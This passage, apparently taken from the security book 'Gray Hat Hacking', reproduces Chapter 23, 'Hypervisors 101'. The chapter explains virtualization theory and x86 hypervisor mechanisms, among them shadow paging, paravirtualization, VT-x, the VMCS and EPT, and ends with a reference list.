                      PART V

      Hacking Hypervisors

Chapter 23   Hypervisors 101
Chapter 24   Creating a Research Framework
Chapter 25   Inside Hyper-V
Chapter 26   Hacking Hypervisors Case Study
This page intentionally left blank
   Hypervisors 101
                                                                               CHAPTER

                                                                                           23
   In this chapter, we cover the following topics:
       • Theoretical model of virtualizable architectures
       • x86 virtualization
       • Paravirtualization
       • Hardware assisted virtualization

Virtualization is the process of creating multiple, isolated, virtual environments where
OSs (guests) can concurrently execute in a physical machine (host). During the last few
years, interest in this technology has increased because of the benefits it provides in the
reduction of operational costs. However, this sharing of physical resources comes with
new security risks. For example, an attacker with access to one of the virtual environ-
ments could exploit a flaw in the virtualization stack and compromise the host, granting
access to the rest of the virtual environments running in that physical machine.
   In this chapter you will learn about the core of the virtualization stack: the hypervisor
software. We’ll start with a theoretical model of a virtualizable architecture, discussing its
properties and general virtualization concepts. Next, we move on to x86 specifics, where
we’ll compare this concrete architecture against the theoretical model. To understand this
chapter, you should be familiar with the x86/x86_64 architectures and with concepts like
the different execution modes, exceptions, segmentation, and paging.

             NOTE Discussing each topic in depth is outside the scope of this book. The
             reader should complement this chapter by reading the material from the
             cited sources.

What Is a Hypervisor?
A hypervisor, or virtual machine monitor (VMM), is a component running in the host
that manages the creation, resource allocation, and execution of virtual machines (VMs).
Every VM provides an isolated virtual environment in which different operating systems
(OSs) can run.
    Virtualization is a concept that goes back to the late 60s, when IBM was developing
its first CP/CMS1 systems: VMM software called Control Program (CP), which could

Gray Hat Hacking: The Ethical Hacker’s Handbook
              run VMs with a lightweight OS called CMS. However, the first successful product to
              fully virtualize 32-bit x86 processors came decades later, when VMware Workstation2
              was introduced in 1999.

              Popek and Goldberg Virtualization Theorems
              In 1974, Gerald J. Popek and Robert P. Goldberg published their virtualization theo-
              rems,3 a work in which they formally introduced the requirements for efficiently virtu-
              alizable architectures. We need to learn this theory before jumping into more tangible
              implementations so we can understand their relationships.
                 Their work starts by assuming a computer model composed of a CPU with user/
              supervisor execution modes and a simple trap mechanism. In this model, memory is
              the only system resource, which the CPU accesses by linear, relative-addressing from a
              relocation-register. The CPU instructions are classified as follows:

                    • Privileged instructions These instructions are only available in supervisor
                      execution mode. In this model, every attempt to execute a privileged instruction
                      causes a trap if the CPU execution mode is user-mode.
                    • Control-sensitive instructions These instructions have effects on the
                      configuration of one or many system resources. In the current model, these
                      effects include the value of the relocation-register and the CPU execution mode.
                    • Behavior-sensitive instructions These instructions display different behavior
                      depending on the configuration of system resources. In the current model, they
                      can be affected by the configuration of the relocation-register (location-sensitive)
                      or by the CPU’s current execution mode (mode-sensitive).
                    • Innocuous instructions These instructions are neither control-sensitive nor
                      behavior-sensitive.

                                 CAUTION Some of the original definitions reflect aspects of the architectures
                                 that existed at the time the work was published. For the sake of simplification,
                                 some definitions are replaced by less precise ones.

                 A VMM is defined as a piece of software running in supervisor-mode and is composed
              of the following modules:

                    • Dispatcher This is the entry point of the trap handler and calls either the
                      allocator or the interpreter based on the source of the trap.
                    • Allocator This is called by the dispatcher when a VM attempts to execute a
                      control-sensitive instruction. The allocator manages system resources, isolating
                      VMM resources from VMs and those assigned to the VMs from each other.
                    • Interpreter This is called by the dispatcher when a VM attempts to execute
                      a privileged-instruction. The interpreter simulates the behavior of the faulting
                      instruction as if it were executed natively.
                                                                                    Chapter 23: Hypervisors 101
  A VM is defined as a virtual environment—more specifically, as an “efficient, isolated,
duplicate of the real machine.” VMs run in user-mode and present the following properties:

   • Equivalence Programs running in a VM should exhibit identical behavior to
     native execution.
   • Efficiency Innocuous instructions should be directly executed by the CPU.
     Programs running in a VM should display “at worst only minor decreases in speed.”
   • Resource-control Programs running in a VM can’t access resources that haven’t
     been explicitly allocated to it by the VMM or that affect other system resources
     in any way.
  From these definitions, three virtualization theorems are stated:

   • For any computer, a VMM may be constructed if its set of sensitive instructions
     is a subset of the set of privileged instructions.
   • A computer is recursively virtualizable if (a) it is virtualizable and (b) a VMM
     without timing dependencies can be constructed for it.
   • A hybrid virtual machine (HVM) may be constructed for any computer in which
     the set of user-sensitive instructions is a subset of the set of privileged instructions.
    The first theorem has important implications on the equivalence and resource-control
properties. If the set of sensitive instructions (the union of control-sensitive and behav-
ior-sensitive instructions) is privileged instructions, then every sensitive instruction
execution attempt by a VM will trap into the VMM’s dispatcher. The dispatcher will
call the allocator if the trap originates from a control-sensitive instruction (the resource-

                                                                                                                  PART V
control property holds) or the interpreter if the trap originates from a behavior-sensitive
instruction (the equivalence property holds). Innocuous instructions are either directly
executed by the CPU or handled by the interpreter in case they are privileged instruc-
tions (equivalence property holds). This kind of VMM implementation is known as
“trap-and-emulate,” and an architecture is considered to be “classically virtualizable” if a
VMM can be fully implemented in this way.
    The second theorem refers to a recursively virtualizable computer, nowadays called
“nested virtualization.” While in theory the virtual environment provided by a VM
should be a duplicate of the real machine, in practice this is not always true. Instead,
it might represent a restricted subset, or a similar computer family. An example from
that time was the CP-67 running on an IBM S/360-67, which supported paging but
exposed the virtual environment of a S/360-65 without paging support. The lack of pag-
ing wouldn’t allow it to recursively run the CP-67, for which it required modifications.
Even if a VMM provides a virtual environment with all the features required by itself, it
still needs to run efficiently in that environment.
    In the third theorem, we encounter a few new definitions: a user-sensitive instruc-
tion is defined as an instruction that is sensitive when executed in user-mode; simi-
larly, a supervisor-sensitive instruction is sensitive when executed in supervisor-mode.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                                                  Popek and Goldberg’s      Multitasking-Supporting
                                                  Computer Model            Hardware
                Execution modes                   Supervisor/user modes     Protection rings
                System resources mapping          Relocation-register       Segmentation and/or paging
                                                  relative addressing
                Traps                             Trap mechanism            Hardware exceptions/traps
Table 23-1 Comparison Between Popek and Goldberg’s Computer Model and Multitasking-
              Supporting Hardware

              Finally, an HVM is defined as a less efficient VMM implementation, in which all
              code executing in virtual supervisor-mode gets interpreted. This theorem loosens the
              requirements of the first theorem so that some of the existing architectures of that time
              could fulfill them.

              Goldberg’s Hardware Virtualizer
              Virtualizable architectures and hardware designed to run multitasking OSs present simi-
              lar characteristics. These similarities come from the existence of hardware mechanisms
              that protect system resources from non-privileged (user) programs. In Table 23-1, we can
              see a side-by-side comparison.
                 We can also observe similarities between a VMM and a multitasking OS kernel. The
              OS kernel runs in a privileged execution mode, it has control over system resources
              (CPU time, memory, and storage), and it provides user programs with an environment
              where they run efficiently. A difference is that there is no equivalence property because
              the environment provided by the OS doesn’t intend to be a duplicate of the real machine.
              Instead, user programs are presented with an “extended machine interface,”4 which is the
              combination of the hardware resources accessed from unprivileged-mode and the kernel
              software interface.
                 Efficient virtualization of these protection mechanisms can be challenging. This was
              considered by Goldberg in one of his previous works when he proposed a “hardware
              virtualizer.”5 He introduced the concept of two different types of resource mappings:
              software-visible mappings controlled by the OS, and software-invisible mappings con-
              trolled by the VMM. A distinction is also made between software-visible traps (handled
              by the OS) and software-invisible traps (handled by the VMM), called VM-faults.

                                 NOTE The Windows 9x kernel module was named “Virtual Machine Manager”
                                 (VMM.vxd), which is an interesting name choice for a kernel that did a pretty
                                 bad job at protecting system resources from unprivileged programs.
                                                                                            Chapter 23: Hypervisors 101
   An example of a software-visible resource mapping is the paging mechanism that
OSs use to map a virtual memory address to either a physical page or a non-present
page. When a program tries to access memory from a virtual address mapping to a non-
present page, it causes a page-fault exception. The exception is handled by the OS kernel,
which decides what to do with it. Goldberg defines this software-visible mapping as the
“ϕ-map,” and the page-fault exception would be a software-visible trap.

                      Program                                            Program

        Hardware                                             Hardware
                            Exception/Trap                                     Exception/Trap
        resources                                            resources

           Mapping to a present resource                    Mapping to a non-present resource

    The hardware virtualizer introduces a new kind of mapping called an “f-map,” which
is invisible to the software running in the VM and is controlled by the VMM. Simply
put, the f-map maps the VM’s virtual resources to real hardware resources. Software run-
ning within a VM accesses its resources via the composed map “f ° ϕ.”

                            VM         Program                    VM-Fault

                                                              f
                           VM                                     Hardware
                                           Exception/Trap
                           resources

                                                                                                                          PART V
                                                                  resources
                                  Mapping to a present resource

   The f-map can also refer to a non-present resource; in this case, an access attempt will
cause a VM-fault.

                            VM         Program                    VM-Fault
                                                              f

                                                                  Hardware
                           VM
                           resources
                                           Exception/Trap         resources

                                Mapping to a non-present resource

   Finally, the f-map can be defined in terms of a recursive VMM, so it is said to map
the virtual resources of an “n+1” level to those of an “n” level. When the “n” level is 0, the
map refers to the real hardware resources. Nested virtualization is possible by recursive
Gray Hat Hacking: The Ethical Hacker’s Handbook
              composition of the f-map for “n” levels. The following illustration shows a simple example
              where “n=1.”

                                    VM                                  VMM n = 1            VMM n = 0

                                                  Program                VM-Fault             VM-Fault
                                       VM

                                                                    f                    f

                                      VM
                                                   Exception/Trap        n=1                 Hardware
                                      resources
                                                                         resources           resources

              Type-1 and Type-2 VMMs
              A VMM implementation can run either on bare metal or under an extended machine
              interface. Hypervisor implementations running on bare metal are known as Type-1
              (native), while the ones running on an extended machine interface are known as
              Type-2 (hosted). Nowadays, different virtualization solutions claim to be either Type-1
              or Type-2. If we get nitpicky, we will see that most of them don’t exactly fit into this
              categorization, because in this distinction the VMM is considered a monolithic com-
              ponent, while in reality the virtualization process is usually distributed among several
              components running at different privilege levels.

                                Hardware                    VM            User process

                              Type-1 VMM              OS kernel
                                                                          User process

                                Hardware             Type-2 VMM               VM              User process

                                OS kernel            User process         OS kernel           User process

                 A Type-2 VMM should be easier to implement because it can make use of existing
              functionality provided by the host OS. However, it usually requires the host OS to be
              extended with functionality needed by the VMM. We usually see virtualization solutions
              of this type (such as VMware Workstation and VirtualBox6) install a set of kernel drivers
              for this purpose. The rest is handled by a worker process running in user-mode. Some
              solutions claiming to be Type-1, like KVM,7 don’t really differ much from this imple-
              mentation scheme.
                 A difficulty faced by Type-1 VMMs is the need for a vast amount of hardware driv-
              ers. Some implementations address this problem by allowing the VMM to pass through
              some system resources to privileged VMs. During the boot process, the VMM creates
              a privileged VM to offload many virtualization tasks, such as handling the hardware
                                                                                  Chapter 23: Hypervisors 101
devices and providing a machine extended interface for the worker processes. In Xen,8
this privileged VM is known as dom0, while in Hyper-V9 it is called the root-partition.
Other Type-1 solutions, like VMware ESXi, bring up their own kernel (VMkernel) to
run the rest of the virtualization stack.

x86 Virtualization
Previous to the existence of hardware virtualization extensions, there were no mecha-
nisms present in the x86 architecture providing software-invisible maps (f-map) or traps
(VM-fault). Still, it would be possible to implement a VMM on top of the software-
visible mechanisms (virtual memory and hardware exceptions). The question is, does the
x86 architecture meet Popek and Goldberg’s virtualization requirements?
    The first virtualization theorem states that the set of sensitive instructions should be
a subset of the privileged instructions. The x86 doesn’t meet this requirement because
its instruction set has sensitive instructions that do not belong to the set of privileged
instructions.10 To see why this is an important limitation, let’s take a deeper look at one
of these instructions.
    Our case study is the Store Interrupt Descriptor Table Register (SIDT) instruction,
which stores the contents of the IDTR register, composed of the size and base of the cur-
rent IDT,11 in the memory address of its destination operand. The SIDT instruction is
known to be problematic since it can be executed from user-mode to retrieve the kernel
address of the current IDT. This situation has forced kernel developers to take measures
like mapping the IDT away from the rest of the kernel and making it read-only as a way
to prevent its use as an exploitation vector.

                                                                                                                PART V
             NOTE Intel finally introduced a feature called User-Mode Instruction
             Prevention (UMIP12) to forbid the user-mode execution of the following
             instructions: SGDT, SIDT, SLDT, SMSW, and STR. All these are sensitive,
             unprivileged instructions!

   Implementing a VMM for the x86 would require taking over the trap mechanism by
installing the VMM’s own IDT and providing virtualized IDTs to the guests that, from
their perspective, should be indistinguishable from real IDTs. A VM shouldn’t be allowed
to execute code at Ring-0 to make sure that any privileged instruction attempt within it
causes a general protection fault (#GPF). This way, the VMM could trap-and-emulate
privileged instructions executed by VMs.
   How can SIDT interfere with the functioning of this VMM? Imagine a VM executing
kernel code at Ring-3. This kernel code wants to get information about its own virtual
IDT, and it does it by executing the SIDT instruction. Because this is not a privileged
instruction, the CPU executes it and no #GPF ever happens. The guest doesn’t receive the
“IDTR” of its own virtual IDT but rather the IDTR contents of the real IDT installed
by the VMM. The equivalence property is broken, and the resource-control property is
violated by exposing sensitive host information to the guest.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Dynamic Binary Translation
              Dynamic binary translation (DBT) is a technique used to rewrite a target’s binary code
              to the equivalent host’s native code. It is commonly used by emulators in conjunction
              with or as a replacement for binary interpretation (where every instruction is interpreted
              by software) in order to achieve faster execution speeds. Target instructions are translated
              on the fly, like in a JIT compiler. DBT can be complex and requires special handling of
              corner cases like self-modifying code.
                 DBT can be used to work around the problems caused by unprivileged, sensitive
              instructions. Unlike emulators, where a complex, cross-architecture type of translation
              is performed, a simpler, lightweight x86-to-x86 translation is employed, where most of
              the original instructions are preserved. Modifications are only made to sensitive unprivi-
              leged instructions, relative addressing, and control flow instructions. The need to per-
              form modifications to the last two are a direct consequence of the side effects in code size
              caused by the translation process itself. Sensitive instructions are translated to code that
              simulates the execution of the original instruction from the point of view of the target.
                 VMM implementers realized they could extend DBT use to translate privileged instruc-
              tions to avoid excessive traps and improve performance. The concept was further extended
              to perform “adaptive binary translation”13 of instructions that would trap when accessing
              system resources (for example, page-table updates when shadow memory is used). Other
              improvements followed, like the translation of clusters of trap-causing instructions.14

              Ring Compression
              We know that a virtualizable architecture requires two modes of operation: a supervisor
              mode to run the VMM, and a user mode to run VM programs. Once the x86 enters pro-
              tected mode, four protection (ring) levels are provided, of which two of them are com-
              monly used by OSs: Ring-0 for kernel code and Ring-3 for user programs. Attempts to
              execute a privileged instruction at any ring level other than Ring-0 causes a trap (#GPF).
              Following this design, VMs should only execute at ring levels 1–3, while the VMM
              should run at Ring-0. To accomplish this, the OS kernel running in the VM must be
              demoted from Ring-0 to one of the other levels.
                 The x86 paging mechanism can only distinguish between “supervisor” and “user”
              pages. Ring levels 0–2 can access both (except when SMAP and SMEP15 are enforced),
              while Ring-3 can only access “user” pages. So, if we want to use paging to protect the
              VMM memory, VMs should only be allowed to run at Ring-3. This means that there
              wouldn’t be a difference in the privilege level of the kernel and its user processes.
                 In a typical OS implementation, the virtual address space is partitioned into two halves,
              mapping the kernel’s memory into every user process. This scheme has a few advantages,
              such as simple discrimination of user/kernel pointers, keeping kernel addresses cached
              in the TLB, and the ability to perform direct copy operations from the kernel to user
              addresses. On the other hand, this sharing of address space has facilitated kernel exploita-
              tion for a long time and has created a need for many mitigations (KASLR,16 UDEREF,17
              SMEP, and SMAP).
                                                                                   Chapter 23: Hypervisors 101
            NOTE In the last years, a number of transient-execution vulnerabilities18
            have been discovered that can be used, among other things, to leak
            privileged memory contents to user-mode. To mitigate many of them,
            Kernel Page-Table Isolation (KPTI19) is enforced; funnily enough, it works by
            removing most of the kernel mappings from user processes, which undoes
            most of the performance benefits provided by the memory split.

   The address space sharing becomes problematic once the kernel is put at Ring-3. As is,
the VMM can’t protect the kernel’s memory for user processes unless it is unmapped and
remapped between context switches, but that would be too expensive. The solution is to
place the kernel at Ring-1. This way, paging can protect the kernel’s memory (supervisor
pages) from user-space. There is a catch: paging can’t protect the VMM’s supervisor pages
from Ring-1, however, we can still use segmentation to protect the VMM’s memory from
the guest kernel.

            CAUTION x86_64 dropped most segmentation features, so the Ring-1
            solution can’t be used in long mode. Some models partially support
            segment limits via the EFER.LMSLE20 feature, but nowadays it is more
            common to find x86_64 processors with hardware virtualization
            extensions, which, as we’ll see later, will save us the trouble of worrying
            about ring compression.

Shadow Paging
The x86 Memory Management Unit (MMU) maps virtual addresses (VAs) to physical

                                                                                                                 PART V
addresses (PAs) by using a software-visible, tree-like data structure known as multilevel
page-tables. Under normal circumstances, page-tables are constantly accessed by the
OS kernel; however, under virtualization, they are a critical resource, and direct access
from VMs must not be allowed. To virtualize the MMU, machine physical addresses
(that is, system physical addresses, or SPAs) must be invisible to the guests, which
instead should be presented with a set of pseudo-physical addresses (that is, guest
physical addresses, or GPAs). The MMU can be seen as a “ϕ-map”; a virtualized MMU
would map GVAs to GPAs. An “f-map” is needed to map GPAs to SPAs, but initially,
the x86 lacked such mechanism (this was later introduced with EPT). To work around
this limitation shadow paging techniques were implemented.
   Shadow paging consists in taking over the “ϕ-map” (the page-tables used by the
MMU) and presenting the guests with a set of virtual page-tables (mapping GVAs to
GPAs). Every guest attempt to write to the set of virtual page-tables will trap into the
VMM, which synchronizes the real set of page-tables (mapping GVAs and HVAs to
SPAs) accordingly.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Address translation is performed by walking the multilevel page-tables, which is a
              process that is completely based on PAs and starts at the PA of the topmost table pointed
              to by the CR3 register. In contrast, once paging is enabled, memory accesses caused
              by instructions are based on VAs, including those to the page-tables themselves, for
              which they need to be self-mapped to be accessed. This self-referencing principle can be
              exploited by the VMM to implement shadow paging.

                                 NOTE In this book we will use the term system physical address (SPA) to
                                 refer to a machine physical address and the term guest physical address
                                 (GPA) to refer to the pseudo-physical address seen by the guest. For page
                                 frame number (PFN), we will use system page frame number (SPFN) or
                                 guest page frame number (GPFN). For virtual address (VA), we will use host
                                 virtual address (HVA) or guest virtual address (GVA). Keep in mind that other
                                 naming schemes exist to refer to the same terms we use.

                 A VMM must handle attempts from the guest OS to access the MMU configuration
              and/or the page-tables. To access the MMU configuration, the guest needs to execute privi-
              leged instructions (to access, for example, the CR3 or CR4 registers). Privileged instruc-
              tions trap, so handling this case is straightforward. Handling guest accesses to page-tables is
              more complicated and involves the construction of a set of pseudo-page-tables.
                 When a guest attempts to set a PA to CR3, this PA is actually a GPA to what the guest
              believes to be the topmost level of its own page-tables. The CR3 write access traps into
              the VMM, which handles it by performing the following steps:
                   1. Get the SPA corresponding to the GPA used by the guest to set CR3.
                   2. Map the SPA into an HVA and start walking the pseudo-page-table pointed by it;
                      each entry contains the GPA (GPFN) of the next level of page-tables.
                   3. For each page-table GPA, get its SPA and repeat from step 2.
                   4. For each pseudo-page-table, build a shadow page-table. This shadow page-table will
                      be used by the MMU, but it will be invisible to the guest. Entries will either point
                      to the next-level table or map a GVA. If the entry points to the next-level table, its
                      SPA must point to the corresponding shadow page-table. If it maps a GVA, then
                      the entry must encode the SPA of the GPA that corresponds to the GVA.
                   5. If a GVA maps a GPA belonging to the set of pseudo-page-tables, then the
                      corresponding entry in the shadow page-table is set as read-only.

                 This way, every time the guest attempts to update its own page-tables, the write
              attempt will trap into the VMM, which will handle the access and update the corre-
              sponding shadow page-table tables. The following illustration shows an example of how
              the GVA of the guest’s PDPT can be translated by the shadow paging mechanism.
                                                                                   Chapter 23: Hypervisors 101
                    (shadow) PDPT       (shadow) PD          (shadow) PT
 (shadow) CR3

                       PD SPFN
                                                              (guest) PDPT SPFN read-only
                                           PT SPFN

   PDPT GVA

                     (guest) PDPT        (guest) PD            (guest) PT
   (guest) CR3

                        PD GPFN
                                                              PDPT GPFN
                                           PT GPFN

       SPA (MMU)
       GPA
       VA offset

    Guests can read from their pseudo-page-tables directly. Also, MMU translations are
direct from GPAs to SPAs by the shadow page-tables, so there is no performance cost
there. On the other hand, handling page-table updates is complex and expensive for two
reasons. First, specialized interpreter routines (x86 emulator) are required for any poten-
tial instruction performing the update. Second, both pseudo-page-tables and shadow-

                                                                                                                 PART V
page-tables have to be kept synchronized. The minimum cost for every page-table update
is the cost of a trap into the VMM (as explained earlier, this cost can be reduced by adap-
tive binary translation).

Paravirtualization
We have seen that properly virtualizing the x86 architecture is complex and, in some cases,
slow. With the goals of simplifying hypervisor design and improving its performance,
some implementations took a different direction. Instead of simulating real hardware, a
synthetic interfaces are provided for communication and cooperation between VMs and
the VMM. Guest OS modifications are required to use these alternative interfaces.
   One of the means paravirtualized guests have to communicate with the VMM is via
hypercalls. This is analogous to the concept of system calls used by user programs to
request services from the OS kernel, but in this case, it’s the guest requesting services
from the VMM. Hypercalls replace functionality usually offered by hardware compo-
nents such as the CPU, the MMU,21 hardware timers, and the interrupt controller, but
can also extend functionality with inter-VM notifications and shared memory support.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Paravirtualized devices can substitute the emulated NIC and storage devices by replac-
              ing them with a split driver model. Device backends run in the host (or in a privileged
              VM) and their job is to manage system resources while offering a synthetic interface
              (simpler and faster than an emulated hardware interface) to the guests. Frontend drivers
              running in the guest communicate with backend devices. The basic transport layer for
              this model can be built on top of the inter-VM communication facilities, usually based
              on ring-buffers over shared memory.
                 Many aspects of paravirtualization remain, even after hardware-assisted virtualization
              overcame many of the limitations that gave rise to it. Furthermore, the hypercall concept
              has been incorporated into hardware (VMCALL22). Nowadays, most hypervisors offer
              varying degrees of paravirtualization capabilities.

              Hardware Assisted Virtualization
              So far, we have seen how virtualization was achieved in the x86 architecture previous
              to the existence of hardware-assisted virtualization. To overcome previous architectural
              limitations and aid the VMM development, hardware extensions were introduced.
              Circa 2005, two main implementations were independently developed: Intel Virtual-
              ization Technology Extensions (VT-x) and AMD Virtualization (AMD-V), previously
              known as Secure Virtual Machine (SVM). The rest of this chapter will cover some
              aspects of VT-x.

              VMX
              Intel introduced the Virtual Machine Extensions (VMX) instruction set, adding two new
              processor execution modes: VMX root operation mode and VMX non-root operation
              mode.23 Like in supervisor-mode, VMX root mode is where the VMM software runs,
              whereas VMs run in VMX non-root mode. We must not confuse VMX operation modes
              with ring levels; they are totally unrelated. Moreover, it is possible for a VM in VMX
              non-root mode to execute code at any of the ring levels; thus, one of the limitations
              solved by hardware virtualization extensions is ring compression.

                                 CAUTION You might find some people talk about “Ring -1” (negative one).
                                 What they actually mean is VMX root mode. VMX operation modes are
                                 unrelated to ring levels, and referring to “Ring -1” only creates confusion.

                 A transition from root mode to non-root mode is called VM-Enter,24 while a transi-
              tion from non-root mode to root mode is known as VM-Exit.25 We can think of the
              latter as being similar to the software-invisible trap mechanism described in Goldberg’s
              hardware virtualizer. With this new trap mechanism introduced by the VMX operation
              modes, the VMM no longer needs to use the IDT for virtualization purposes but still
              must use it to handle hardware exceptions and interrupts.
                                                                                Chapter 23: Hypervisors 101
   A data structure known as the virtual machine control structure (VMCS26) can be
accessed from VMX root mode. By manipulating this structure, the VMM can con-
trol many virtualization aspects, including VMX mode transitions behavior. Usually, a
VMCS is assigned to each virtual processor of every VM (a VM could have more than
one virtual processor), but each physical processor (or logical processor, taking SMT into
account) can only have one “current” VMCS.
   VMCS fields can be classified in a few different groups that we will discuss.

VMCS “guest-state” Area
This area corresponds to the VMCS fields where virtual processor state is saved upon
a VM-Exit, and the same fields are used to load the virtual processor state upon a
VM-Enter. This is the minimal state that should be handled by hardware to transition
from VMX modes safely and should at least include the following:

   • RIP, RSP, RFLAGS.
   • Control registers, DR7.
   • Selector, access rights, base and limit of segment registers, LDTR, and TR. Base
     and limit of GDTR and IDTR.
   • MSRs: IA32_EFER, IA32_SYSENTER_CS, IA32_SYSENTER_ESP, and
     IA32_SYSENTER_EIP.

VMCS “host-state” Area
This is the counterpart to the guest-state area and corresponds to the VMM’s processor
state. The host-state is loaded upon every VM-Exit and saved on every VM-Enter.

                                                                                                              PART V
VMCS Control Fields
The behavior of VMX non-root mode can be selectively controlled by a set of VMCS
control fields. Among other things, they allow you to:

   • Control which events can cause a VM-Exit.
   • Control VM-Exit and VM-Enter transitions, including details about processor
     state saving. In the case of VM-Enter, it is possible to synthesize interrupts and
     exceptions (“event injection”).
   • Configure various other virtualization features, such as EPT, APIC virtualization,
     unrestricted guest, and VMCS shadowing.
   • Grant access to system resources (IO and MSR bitmaps27). This enables the
     creation of privileged VMs with hardware access capabilities.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              VMCS VM-Exit Information Fields
              On VM-Exit events, a few VMCS fields are updated with information about the nature
              of the event. The most important is the exit-reason field, which encodes the cause of the
              VM-Exit. Other fields complement it with event-specific information; some of them
              are exit qualification, instruction length, instruction information, interruption infor-
              mation, guest linear address, and guest physical address.

              VM-Exit Reasons
              VM-Exits can be synchronous or asynchronous, with the latter originating from sources
              such as external interrupts, or the VMX preemption timer. Synchronous VM-Exits are
              caused by VM behavior, and they can be either conditional or unconditional. Only very
              few instructions cause unconditional VM-Exits (CPUID is one of them), and the others
              will cause a conditional VM-Exit depending on the VMCS configuration (control fields).
                 One would think that control-sensitive instructions will always cause VM-Exits, but
              as we have seen, it is possible to give a VM access to system resources, so this is not
              always true. The opposite can also happen: innocuous instructions like the spin-loop hint
              instruction PAUSE can be set to cause a VM-Exit (to address the lock holder preemption
              problem28). Other sensitive instructions can be either handled by the VMM (conditional
              VM-Exit) or by the virtualization hardware directly. Finally, those unprivileged, sensitive
              instructions we talked about earlier in this chapter can be properly handled now.

              EPT
              We have seen how shadow paging can be implemented on top of the existing paging
              mechanism to virtualize the MMU. Shadow paging is complex, and page-table updates
              are expensive; therefore, to improve this situation, a new hardware-assisted technology
              known as Second Level Address Translation (SLAT) was developed. Intel implements
              SLAT with Extended Page Tables (EPT29).
                  In a nutshell, EPT works like page-tables; the difference is that whereas page-tables
              translate VAs to PAs, EPT translates GPAs to SPAs. The VMM running in VMX root
              mode must set up and maintain a set of EPT multilevel page-tables, which are used to
              translate GPAs to SPAs. The top-level EPT pointer (EPTP30) is stored in one of the
              VMCS control fields.
                  From the guest perspective, we still use page-tables as usual to translate VAs to PAs; in
              reality, those are GVAs and GPAs. To access a page, the CPU first walks the guest’s page-
              tables to get a GPA from its GVA; then it walks the EPT tables (which are invisible to
              the guest) to get a SPA from the GPA. If we remember Goldberg’s hardware virtualizer,
              we could see page-tables as the ϕ-map and EPT as the f-map. A GVA-to-SPA translation
              is done by the composed map “f ° ϕ.”
                  Keep in mind that when the CPU walks the guest’s multilevel page-tables, each level
              (in long-mode: PML4, PDPT, PD, PT) points to the next one by its GPA, meaning
              that each page-table level has to be translated by the EPT mechanism. This is known
              as a “2-dimensional page walk,”31 and in the worst case (when every translation step
              incurs in a cache miss) 24 memory loads are needed to translate a GVA. Even if address
                                                                                 Chapter 23: Hypervisors 101
translations can be more expensive than with shadow paging, the biggest advantage of
EPT is that page-table updates are direct, thus reducing the number of traps and simpli-
fying the VMM implementation.

         GVA

                      CR3      PML4       PDPT       PD         PT

                                      EPTP (VMCS)

                                        EPT PML4

                                        EPT PDPT

                                         EPT PD

                                         EPT PT
                                                                             f

                                                               SPA

    Like with page-tables, EPT allows you to map an address to a nonexistent physical
page. An access attempt in this case will cause a VM-Exit. The basic-exit-reason for this
kind of trap is EPT-violation.32 Additionally, the exit qualification and guest physical
address fields are set.
    In some cases, EPT might not be totally invisible to guests; for the sake of improving
performance, some EPT-related features can be exposed to VMs. One of these features

                                                                                                               PART V
is the EPT-switching33 function (called with the VMFUNC instruction), which allows
a guest to switch its EPTP explicitly from a list of values established by the VMM.
Another important feature is Virtualization Exceptions (#VE34). As the name suggests,
the feature can be used to deliver virtualization-related exceptions to the guest via the
IDT vector 20. This feature can be used together with Convertible EPT Violations, so
when an EPT-violation happens, it doesn’t cause a VM-Exit. Instead, a #VE is delivered
to the guest to handle it, thus avoiding traps into the VMM.

Summary
In this chapter we looked at general virtualization concepts—going from theoretical
models to concrete implementations in the x86 architecture. We discussed some of the
initial limitations of the x86 architecture and the techniques employed to overcome
them. Finally, we covered both the evolution of hypervisor software and the x86 archi-
tecture itself, with the introduction of hardware virtualization extensions.
   In the next chapter we will use this knowledge to map the attack surface for a wide
range of hypervisor implementations: from the ones supporting old x86 models, to
implementations taking advantage of current hardware capabilities and those including
paravirtualization support.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              References
                   1. “z/VM – A Brief Review of Its 40 Year History,” www.vm.ibm.com/vm40hist.pdf.
                   2. “VMware Timeline,” www.vmware.com/timeline.html.
                   3. Gerald J. Popek and Robert P. Goldberg, “Formal requirements for virtualizable
                      third generation architectures,” dl.acm.org/doi/10.1145/361011.361073.
                   4. U. Gagliardi and J. Buzen, “The evolution of virtual machine architecture,” www
                      .computer.org/csdl/proceedings-article/afips/1973/50810291/12OmNxGALa2.
                   5. R. P. Goldberg, “Architecture of virtual machines,” dl.acm.org/
                      doi/10.1145/800122.803950.
                   6. “Oracle VM VirtualBox,” www.virtualbox.org.
                   7. “Linux KVM,” www.linux-kvm.org.
                   8. “Xen Project,” xenproject.org.
                   9. “Hyper-V Technology Overview,” docs.microsoft.com/en-us/windows-server/
                      virtualization/hyper-v/hyper-v-technology-overview.
                 10. John Scott Robin and Cynthia E. Irvine, “Analysis of the Intel Pentium’s Ability
                     to Support a Secure Virtual Machine Monitor,” www.usenix.org/events/sec2000/
                     full_papers/robin/robin.pdf.
                 11. “Intel 64 and IA-32 Architectures Software Developer’s Manual, Volume 3:
                     System Programming Guide,” software.intel.com/content/dam/develop/external/
                     us/en/documents-tps/325384-sdm-vol-3abcd.pdf.
                 12. ibid.
                 13. K. Adams and O. Agesen, “A Comparison of Software and Hardware Techniques
                     for x86 Virtualization,” www.vmware.com/pdf/asplos235_adams.pdf.
                 14. O. Agesen, J. Mattson, R. Rugina, and J. Sheldon, “Software Techniques for
                     Avoiding Hardware Virtualization Exits,” www.usenix.org/system/files/conference/
                     atc12/atc12-final158.pdf.
                 15. “Intel 64 and IA-32 Architectures Software Developer’s Manual Volume 3:
                     System Programming Guide,” op. cit.
                 16. “Kernel address space layout randomization,” lwn.net/Articles/569635/.
                 17. “UREDERF,” grsecurity.net/~spender/uderef.txt.
                 18. “Transient Execution Attacks,” github.com/IAIK/transientfail.
                 19. “The current state of kernel page-table isolation,” https://lwn.net/Articles/741878/.
                 20. “AMD64 Architecture Programmer’s Manual, Volume 2: System Programming,”
                     www.amd.com/system/files/TechDocs/24593.pdf.
                                                                          Chapter 23: Hypervisors 101
21. “X86 Paravirtualised Memory Management,” wiki.xenproject.org/wiki/X86_
    Paravirtualised_Memory_Management.
22. “Intel 64 and IA-32 Architectures Software Developer’s Manual, Volume 3:
    System Programming Guide,” op. cit.
23. ibid.
24. ibid.
25. ibid.
26. ibid.
27. ibid.
